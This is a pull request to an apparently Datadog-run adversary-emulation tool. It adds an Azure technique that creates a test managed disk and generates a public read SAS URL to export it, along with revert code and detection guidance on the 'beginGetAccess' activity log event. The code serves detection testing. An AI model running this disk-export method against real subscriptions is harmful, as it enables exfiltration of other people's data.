### PR TITLE
New attack technique: Export Disk Through SAS URL

### DIFF
--- a/docs/attack-techniques/azure/azure.exfiltration.disk-export.md
+++ b/docs/attack-techniques/azure/azure.exfiltration.disk-export.md
@@ -1,0 +1,66 @@
+---
+title: Export Disk Through SAS URL
+---
+
+# Export Disk Through SAS URL
+
+
+ <span class="smallcaps w3-badge w3-blue w3-round w3-text-white" title="This attack technique can be detonated multiple times">idempotent</span> 
+
+Platform: Azure
+
+## MITRE ATT&CK Tactics
+
+
+- Exfiltration
+
+## Description
+
+
+Generate a public [Shared Access Signature (SAS)](https://docs.microsoft.com/en-us/azure/storage/common/storage-sas-overview) URL to download an Azure disk.
+
+<span style="font-variant: small-caps;">Warm-up</span>:
+
+- Create an Azure-managed disk
+
+<span style="font-variant: small-caps;">Detonation</span>:
+
+- Generated a Shared Access Signature (SAS) URL for the disk
+
+References:
+
+- https://powerzure.readthedocs.io/en/latest/Functions/operational.html#get-azurevmdisk
+- https://zigmax.net/azure-disk-data-exfiltration/
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate azure.exfiltration.disk-export
+```
+## Detection
+
+
+Identify <code>Microsoft.Compute/disks/beginGetAccess/action</code> events in Azure Activity logs.
+
+Sample event (redacted for clarity):
+
+```json hl_lines="6"
+{
+  "resourceId": "/SUBSCRIPTIONS/<your-subscription-id>/RESOURCEGROUPS/RG-IKFFQ01Z/PROVIDERS/MICROSOFT.COMPUTE/DISKS/STRATUS-RED-TEAM-DISK",
+  "evt": {
+    "category": "Administrative",
+    "outcome": "Success",
+    "name": "MICROSOFT.COMPUTE/DISKS/BEGINGETACCESS/ACTION"
+  },
+  "level": "Information",
+  "properties": {
+    "hierarchy": "ecc2b97b-844b-414e-8123-b925dddf87ed/2fd72d85-b49f-4e19-b567-4a8cb7301e8b",
+    "message": "Microsoft.Compute/disks/beginGetAccess/action",
+    "eventCategory": "Administrative",
+    "entity": "/subscriptions/<your-subscription-id/resourceGroups/rg-ikffq01z/providers/Microsoft.Compute/disks/stratus-red-team-disk"
+  }
+}
+```
+
+

--- a/docs/attack-techniques/azure/index.md
+++ b/docs/attack-techniques/azure/index.md
@@ -8,3 +8,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 - [Execute Commands on Virtual Machine using Run Command](./azure.execution.vm-run-command.md)
 
+
+## Exfiltration
+
+- [Export Disk Through SAS URL](./azure.exfiltration.disk-export.md)
+

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -34,6 +34,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Create a Login Profile on an IAM User](./AWS/aws.persistence.iam-create-user-login-profile.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Backdoor Lambda Function Through Resource-Based Policy](./AWS/aws.persistence.lambda-backdoor-function.md) | [AWS](./AWS/index.md) | Persistence |
 | [Execute Commands on Virtual Machine using Run Command](./azure/azure.execution.vm-run-command.md) | [Azure](./azure/index.md) | Execution |
+| [Export Disk Through SAS URL](./azure/azure.exfiltration.disk-export.md) | [Azure](./azure/index.md) | Exfiltration |
 | [Dump All Secrets](./kubernetes/k8s.credential-access.dump-secrets.md) | [Kubernetes](./kubernetes/index.md) | Credential Access |
 | [Steal Pod Service Account Token](./kubernetes/k8s.credential-access.steal-serviceaccount-token.md) | [Kubernetes](./kubernetes/index.md) | Credential Access |
 | [Create Admin ClusterRole](./kubernetes/k8s.persistence.create-admin-clusterrole.md) | [Kubernetes](./kubernetes/index.md) | Persistence, Privilege Escalation |

--- a/internal/attacktechniques/azure/exfiltration/disk-export/main.go
+++ b/internal/attacktechniques/azure/exfiltration/disk-export/main.go
@@ -1,0 +1,130 @@
+package azure
+
+import (
+	"context"
+	_ "embed"
+	"errors"
+	"github.com/Azure/azure-sdk-for-go/sdk/azcore/runtime"
+	"github.com/Azure/azure-sdk-for-go/sdk/azcore/to"
+	"github.com/Azure/azure-sdk-for-go/sdk/resourcemanager/compute/armcompute"
+	"github.com/aws/smithy-go/ptr"
+	"github.com/datadog/stratus-red-team/internal/providers"
+	"github.com/datadog/stratus-red-team/pkg/stratus"
+	"github.com/datadog/stratus-red-team/pkg/stratus/mitreattack"
+	"log"
+	"time"
+)
+
+//go:embed main.tf
+var tf []byte
+
+func init() {
+	const codeBlock = "```"
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:           "azure.exfiltration.disk-export",
+		FriendlyName: "Export Disk Through SAS URL",
+		Description: `
+Generate a public [Shared Access Signature (SAS)](https://docs.microsoft.com/en-us/azure/storage/common/storage-sas-overview) URL to download an Azure disk.
+
+Warm-up:
+
+- Create an Azure-managed disk
+
+Detonation:
+
+- Generated a Shared Access Signature (SAS) URL for the disk
+
+References:
+
+- https://powerzure.readthedocs.io/en/latest/Functions/operational.html#get-azurevmdisk
+- https://zigmax.net/azure-disk-data-exfiltration/
+`,
+		Detection: `
+Identify <code>Microsoft.Compute/disks/beginGetAccess/action</code> events in Azure Activity logs.
+
+Sample event (redacted for clarity):
+
+` + codeBlock + `json hl_lines="6"
+{
+  "resourceId": "/SUBSCRIPTIONS/<your-subscription-id>/RESOURCEGROUPS/RG-IKFFQ01Z/PROVIDERS/MICROSOFT.COMPUTE/DISKS/STRATUS-RED-TEAM-DISK",
+  "evt": {
+    "category": "Administrative",
+    "outcome": "Success",
+    "name": "MICROSOFT.COMPUTE/DISKS/BEGINGETACCESS/ACTION"
+  },
+  "level": "Information",
+  "properties": {
+    "hierarchy": "ecc2b97b-844b-414e-8123-b925dddf87ed/2fd72d85-b49f-4e19-b567-4a8cb7301e8b",
+    "message": "Microsoft.Compute/disks/beginGetAccess/action",
+    "eventCategory": "Administrative",
+    "entity": "/subscriptions/<your-subscription-id/resourceGroups/rg-ikffq01z/providers/Microsoft.Compute/disks/stratus-red-team-disk"
+  }
+}
+` + codeBlock + `
+`,
+		Platform:                   stratus.Azure,
+		IsIdempotent:               true,
+		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Exfiltration},
+		PrerequisitesTerraformCode: tf,
+		Detonate:                   detonate,
+		Revert:                     revert,
+	})
+}
+
+func detonate(params map[string]string) error {
+	diskName := params["disk_name"]
+	disksClient, err := getAzureDisksClient()
+	if err != nil {
+		return errors.New("unable to instantiate Azure disks client: " + err.Error())
+	}
+
+	log.Println("Creating Shared Access Secret (SAS) URL for disk " + diskName)
+
+	readPermissions := armcompute.GrantAccessData{
+		Access:            to.Ptr(armcompute.AccessLevelRead),
+		DurationInSeconds: ptr.Int32(3600),
+	}
+	sharingTask, err := disksClient.BeginGrantAccess(context.Background(), params["resource_group_name"], diskName, readPermissions, nil)
+	if err != nil {
+		return errors.New("unable to export disk: " + err.Error())
+	}
+
+	sharingResult, err := sharingTask.PollUntilDone(context.Background(), &runtime.PollUntilDoneOptions{Frequency: 1 * time.Second})
+	if err != nil {
+		return errors.New("disk export failed: " + err.Error())
+	}
+
+	exportUrl := *sharingResult.AccessSAS
+	log.Println("Successfully generated SAS URL for disk at " + exportUrl)
+	return nil
+}
+
+func revert(params map[string]string) error {
+	diskName := params["disk_name"]
+	disksClient, err := getAzureDisksClient()
+	if err != nil {
+		return errors.New("unable to instantiate Azure disks client: " + err.Error())
+	}
+
+	log.Println("Creating Shared Access Secret (SAS) URL for disk " + diskName)
+
+	revokeTask, err := disksClient.BeginRevokeAccess(context.Background(), params["resource_group_name"], diskName, nil)
+	if err != nil {
+		return errors.New("unable to revoke access to disk: " + err.Error())
+	}
+
+	_, err = revokeTask.PollUntilDone(context.Background(), &runtime.PollUntilDoneOptions{Frequency: 1 * time.Second})
+	if err != nil {
+		return errors.New("revokation of disk access failed: " + err.Error())
+	}
+
+	log.Println("Successfully revoked SAS URL for disk " + diskName)
+	return nil
+}
+
+func getAzureDisksClient() (*armcompute.DisksClient, error) {
+	cred := providers.Azure().GetCredentials()
+	subscriptionID := providers.Azure().SubscriptionID
+	clientOptions := providers.Azure().ClientOptions
+	return armcompute.NewDisksClient(subscriptionID, cred, clientOptions)
+}

--- a/internal/attacktechniques/azure/exfiltration/disk-export/main.tf
+++ b/internal/attacktechniques/azure/exfiltration/disk-export/main.tf
@@ -1,0 +1,44 @@
+terraform {
+  required_providers {
+    azurerm = {
+      source  = "hashicorp/azurerm"
+      version = "3.8.0"
+    }
+  }
+}
+
+provider "azurerm" {
+  features {}
+}
+
+resource "random_string" "suffix" {
+  length  = 8
+  special = false
+  upper   = false
+}
+
+resource "azurerm_resource_group" "rg" {
+  name     = "rg-${random_string.suffix.result}"
+  location = "West US"
+}
+
+resource "azurerm_managed_disk" "disk" {
+  name                 = "stratus-red-team-disk"
+  location             = azurerm_resource_group.rg.location
+  resource_group_name  = azurerm_resource_group.rg.name
+  storage_account_type = "Standard_LRS"
+  create_option        = "Empty"
+  disk_size_gb         = "1"
+}
+
+output "disk_name" {
+  value = azurerm_managed_disk.disk.name
+}
+
+output "resource_group_name" {
+  value = azurerm_resource_group.rg.name
+}
+
+output "display" {
+  value = format("Disk %s ready in resource group %s", azurerm_managed_disk.disk.name, azurerm_resource_group.rg.name)
+}

--- a/internal/attacktechniques/main.go
+++ b/internal/attacktechniques/main.go
@@ -26,6 +26,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/persistence/iam-create-user-login-profile"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/persistence/lambda-backdoor-function"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/azure/execution/vm-run-command"
+	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/azure/exfiltration/disk-export"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/credential-access/dump-secrets"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/credential-access/steal-serviceaccount-token"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/k8s/persistence/create-admin-clusterrole"


### PR DESCRIPTION
### What does this PR do?

Implement a new attack technique that exports a VM disk using a Shared Access Signature public URL.

Sample output:

```
$  stratus detonate azure.exfiltration.disk-export
2022/06/10 23:19:54 Checking your authentication against azure
2022/06/10 23:19:54 Warming up azure.exfiltration.disk-export
2022/06/10 23:19:54 Initializing Terraform to spin up technique prerequisites
2022/06/10 23:20:01 Applying Terraform to spin up technique prerequisites
2022/06/10 23:20:44 Disk stratus-red-team-disk ready in resource group rg-323a8o8x
2022/06/10 23:20:44 Creating Shared Access Secret (SAS) URL for disk stratus-red-team-disk
2022/06/10 23:20:49 Successfully generated SAS URL for disk at https://md-hdd-jmnwsmmwsnjt.z33.blob.storage.azure.net/jntpcvfgz5jc/abcd?sv=2018-03-28&sr=b&si=d11697d3-79cc-403a-97c7-60c171c8c7d3&sig=yfwQ7LOphAwITGyo%2BKfeBSMRfzLaJ%2BGK0ykRPkSTMBQ%3D
```

### Motivation

* Powerzure function https://github.com/hausec/PowerZure/blob/master/PowerZure.psm1#L959
* Straightforward way to exfiltrate data in Azure
